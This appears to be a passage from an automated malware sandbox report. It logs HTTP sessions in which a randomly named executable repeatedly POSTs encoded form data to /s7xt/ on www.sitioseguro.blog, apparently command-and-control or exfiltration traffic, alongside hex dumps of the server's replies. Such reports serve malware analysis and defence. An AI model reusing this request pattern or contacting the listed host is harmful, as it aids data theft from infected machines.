                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opa [TRUNCATED]
                                                                            Nov 24, 2024 08:22:59.499258041 CET1236INData Raw: 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 37 66 61 66 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 37 2c 32 35 30 2c 32 35 32 2c 76 61 72 28 2d 2d 62 67
                                                                            Data Ascii: --bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;bord
                                                                            Nov 24, 2024 08:22:59.499264956 CET1236INData Raw: 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 2e 72 65 6c 61 74 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 6f 70 2d 30 7b 74 6f 70 3a 30 7d 2e 72 69 67 68 74 2d 30 7b 72 69 67 68 74 3a 30 7d 2e 73 68 61 64 6f 77 7b 62
                                                                            Data Ascii: position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,
                                                                            Nov 24, 2024 08:22:59.499475002 CET1236INData Raw: 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 70 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 6f 70 61 63 69 74 79 3a 31 7d 37 35 25 2c 74 6f
                                                                            Data Ascii: form:rotate(1turn)}}@-webkit-keyframes ping{0%{transform:scale(1);opacity:1}75%,to{transform:scale(2);opacity:0}}@keyframes ping{0%{transform:scale(1);opacity:1}75%,to{transform:scale(2);opacity:0}}@-webkit-keyframes pulse{0%,to{opacity:1}50%{
                                                                            Nov 24, 2024 08:22:59.499481916 CET896INData Raw: 7d 2e 73 6d 5c 3a 74 65 78 74 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 6d 5c 3a 74 65 78 74 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74
                                                                            Data Ascii: }.sm\:text-left{text-align:left}.sm\:text-right{text-align:right}}@media (min-width:768px){.md\:border-t-0{border-top-width:0}.md\:border-l{border-left-width:1px}.md\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}}@media (min-width
                                                                            Nov 24, 2024 08:22:59.499488115 CET967INData Raw: 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20
                                                                            Data Ascii: body { font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color E


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.1049976172.67.162.39804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:05.068605900 CET694OUTPOST /s7xt/ HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.sitioseguro.blog/s7xt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 2b 70 39 7a 31 69 43 59 31 56 31 55 67 64 79 62 57 39 6d 61 4a 6d 65 78 63 52 74 35 41 32 62 75 35 62 76 44 54 6a 42 75 50 30 6f 35 6a 30 30 44 6c 6a 71 53 6d 57 4e 75 78 35 64 41 65 75 34 6e 57 50 4c 75 48 37 52 79 56 4a 4a 6b 4b 43 6c 35 72 4e 4c 79 53 74 78 6c 73 44 49 4c 69 44 58 2f 37 69 34 6f 6f 2b 62 31 59 52 38 7a 73 4f 6f 4a 57 6e 6d 35 58 47 56 71 6a 69 32 78 47 47 68 79 35 76 55 69 31 4a 58 39 75 36 74 66 41 54 33 72 55 34 56 4f 38 50 47 45 61 77 68 4a 33 71 50 6c 66 34 62 67 45 66 53 73 75 44 5a 69 72 73 51
                                                                            Data Ascii: GX6Lp2F=HKwmnw8C74mvA+p9z1iCY1V1UgdybW9maJmexcRt5A2bu5bvDTjBuP0o5j00DljqSmWNux5dAeu4nWPLuH7RyVJJkKCl5rNLyStxlsDILiDX/7i4oo+b1YR8zsOoJWnm5XGVqji2xGGhy5vUi1JX9u6tfAT3rU4VO8PGEawhJ3qPlf4bgEfSsuDZirsQ
                                                                            Nov 24, 2024 08:23:06.307883978 CET925INHTTP/1.1 405 Not Allowed
                                                                            Date: Sun, 24 Nov 2024 07:23:06 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzWBnlZsnV%2B8Xu1MNUkFG1bvA7yyS0kw%2FhUseMDoSdDZvbZ9ujK3SnJbQMG2bJ96SOpcV2NIhKomYYgZQcGKBnbx9JTrWKoQqPAe8Ob4%2BJdJK1hvRcH9yKL1RAEcoZmQ1LlT1%2FmLug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a6d2ec350fa9-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.1049981172.67.162.39804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:07.740407944 CET718OUTPOST /s7xt/ HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.sitioseguro.blog/s7xt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 66 5a 39 31 55 69 43 64 56 56 32 49 77 64 79 52 32 39 36 61 4a 36 65 78 64 45 77 35 79 53 62 75 59 72 76 43 52 48 42 76 50 30 6f 68 54 31 38 65 31 6a 6a 53 6d 61 76 75 77 46 64 41 65 4b 34 6e 54 4c 4c 75 55 54 51 30 46 4a 48 38 36 43 6e 33 4c 4e 4c 79 53 74 78 6c 73 58 79 4c 69 37 58 2f 4f 79 34 79 4a 2b 63 70 6f 52 2f 30 73 4f 6f 44 47 6e 71 35 58 47 7a 71 6d 43 63 78 45 4f 68 79 34 66 55 69 6b 4a 55 7a 75 36 72 63 77 53 4f 72 42 49 66 41 5a 76 5a 4d 4a 55 6f 58 6e 32 4c 6d 2b 46 63 78 56 2b 46 2f 5a 66 58 73 74 5a 36 4b 47 79 75 65 72 5a 4b 4c 37 4f 58 74 6f 34 54 6d 63 4c 49 6d 67 3d 3d
                                                                            Data Ascii: GX6Lp2F=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5ySbuYrvCRHBvP0ohT18e1jjSmavuwFdAeK4nTLLuUTQ0FJH86Cn3LNLyStxlsXyLi7X/Oy4yJ+cpoR/0sOoDGnq5XGzqmCcxEOhy4fUikJUzu6rcwSOrBIfAZvZMJUoXn2Lm+FcxV+F/ZfXstZ6KGyuerZKL7OXto4TmcLImg==
                                                                            Nov 24, 2024 08:23:08.932344913 CET937INHTTP/1.1 405 Not Allowed
                                                                            Date: Sun, 24 Nov 2024 07:23:08 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ba6ajoZpDtKCb0qZ%2FewlL%2Fyh%2Bt08%2BNMhuf6%2Fp3SNIZC0zxG%2BI6%2Fgwg8H37f4ffrlL59mDCakUai5rvM6nCiJMG4auGHqmbiX6PeZ9CN%2F9ZeYWjTqeeoKD%2BZdAtHwdx%2Fk49vd6OFfkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a6e34a100f55-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1515&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.1049988172.67.162.39804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:10.411919117 CET1731OUTPOST /s7xt/ HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.sitioseguro.blog/s7xt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 66 5a 39 31 55 69 43 64 56 56 32 49 77 64 79 52 32 39 36 61 4a 36 65 78 64 45 77 35 79 61 62 74 71 7a 76 44 78 37 42 2b 2f 30 6f 73 7a 31 39 65 31 69 6a 53 6d 53 72 75 77 49 6f 41 63 69 34 68 78 44 4c 2b 31 54 51 36 46 4a 48 31 61 43 6d 35 72 4e 37 79 57 4a 31 6c 73 48 79 4c 69 37 58 2f 50 43 34 38 49 2b 63 36 34 52 38 7a 73 50 6e 4a 57 6e 47 35 58 50 47 71 6d 50 72 78 30 75 68 7a 59 50 55 67 57 68 55 2f 75 36 70 5a 77 53 2f 72 42 4e 46 41 5a 62 6a 4d 49 77 53 58 6c 6d 4c 6c 4a 67 77 6b 32 37 59 69 62 48 73 6e 75 64 61 4e 6a 79 57 58 62 6b 42 4c 75 6d 34 7a 72 70 64 74 2b 69 52 35 42 55 56 39 70 38 39 52 45 4c 37 78 71 4a 39 71 52 71 2f 31 37 34 7a 33 4f 37 67 67 6f 39 4c 56 55 48 7a 77 62 64 34 74 7a 73 33 66 35 58 51 73 78 2f 4d 65 7a 71 67 6a 74 73 6a 45 73 6e 4b 48 36 73 6a 47 50 4e 38 61 4e 35 2f 75 72 33 77 37 32 30 6d 7a 62 64 46 43 39 59 6b 54 77 43 65 4d 5a 66 6e 5a 75 58 50 6f 6d 55 31 79 4c 74 32 75 53 74 57 38 2b 61 79 47 4f [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5yabtqzvDx7B+/0osz19e1ijSmSruwIoAci4hxDL+1TQ6FJH1aCm5rN7yWJ1lsHyLi7X/PC48I+c64R8zsPnJWnG5XPGqmPrx0uhzYPUgWhU/u6pZwS/rBNFAZbjMIwSXlmLlJgwk27YibHsnudaNjyWXbkBLum4zrpdt+iR5BUV9p89REL7xqJ9qRq/174z3O7ggo9LVUHzwbd4tzs3f5XQsx/MezqgjtsjEsnKH6sjGPN8aN5/ur3w720mzbdFC9YkTwCeMZfnZuXPomU1yLt2uStW8+ayGOQUw/+O6l2oTRZXwHnx/0I2Q4zEz0sPh4mt5auqMrIE6vJtOZHm8pfU0zlUC6BApk9wlOBn0Hrxtco4z4D1jpV/5+sBZpvyXs3vRRQL39sBZueUs9XCAJ+iMipjIsFbM4yAONeoovwjabLCv/tIyy4HjAPOsopGYp3Ii48k2SXsEAfNicKNPSbEpyHyiuX8iKD/Vkl5PcjOL18V5T1mr0V2mpRt0xtp/a9BTTaUypEQQUwBY+SCE98BiOcelkWPU3Z8NUhjiHbuln1xQEVw3oqAIm2nXZ0F+QyDpypJwRyTPqnljdm0buaw1EeGlrnvl7Dp6psGeSTcZiGSjnKccSR2SDQVRX497mAF/uN/+Ri2De6jgT7AAWE5V7gkN0qvFFQi3r5clNi53WBfV+qbZfDy+EGW7DHs6+3uPo1XVAi8KMetlBjmrLsKhhZx9/jxNitwm7H5AHvQ6goE2w6LBCoSyHL8zU+W0XbWQzvSgiT0u2ZOwjIay8cVCf9sHT1NZ3557Y6VLEHwqQYsoeUYrx+C/9wZ+PFZvieUyCFIh388jXObHuyJFRNdOLMps17QYm6qQv9qpgA+/+Sp3fyNfDN0aFbaj+WJuP3w32m9i2ZizBRD4bk1To0QA0qk7j0RqqfdnUj/aevicDSMoPRcsCyYgta/PrDrAwDF [TRUNCATED]
                                                                            Nov 24, 2024 08:23:11.654504061 CET926INHTTP/1.1 405 Not Allowed
                                                                            Date: Sun, 24 Nov 2024 07:23:11 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GIMh6sffulJLZ4tycV5e9d%2FhLXv%2BRyRwHn1hoD3u46tdGL%2Bx9C0OxxYGgK7qcMgb1HjAqf2ebPadbIyT0mIxaNnTlEaM1uvYoJClfwLVq8S2Omjv9AQXboqTL4Lbs3SbVasZU65k%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a6f4487d42f1-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1565&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1731&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.1049993172.67.162.39804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:23:13.077807903 CET426OUTGET /s7xt/?GX6Lp2F=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9U5k7peL8+9qmxBtq+TRLy+e1vGRqg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.sitioseguro.blog
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:23:14.280555010 CET1236INHTTP/1.1 200 OK
                                                                            Date: Sun, 24 Nov 2024 07:23:14 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                            Accept-Ranges: bytes
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1gKy9Di0chRBpBtHVVXs7THJZWUdaygMMv8JXglRNzN4Jte%2FihhSanlL1HGtNV5ga48T661xsjmg%2BGNrkpGBaSTEoSL8j0xv2OZFMnOW%2BocLqXNqTUrmIJtido4QXQNM4ijD7TpBEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e77a704ce81efa7-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=77&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                                            Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.mai
                                                                            Nov 24, 2024 08:23:14.280603886 CET1236INData Raw: 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65
                                                                            Data Ascii: n,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;fo
                                                                            Nov 24, 2024 08:23:14.280612946 CET1236INData Raw: 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 2d 32 35
                                                                            Data Ascii: :-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-height:1.2777777778}.window-main_
                                                                            Nov 24, 2024 08:23:14.280656099 CET1236INData Raw: 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65
                                                                            Data Ascii: ain__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-
                                                                            Nov 24, 2024 08:23:14.280729055 CET896INData Raw: 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34
                                                                            Data Ascii: 878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20r
                                                                            Nov 24, 2024 08:23:14.280735970 CET1236INData Raw: 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 30 2e 38 37 35 72 65 6d 20 2c 30 2e 37 32 38 36 35 38 35 33 36 36 72 65 6d 20 2b 20 30 2e 37 33 31 37 30 37 33 31 37 31 76
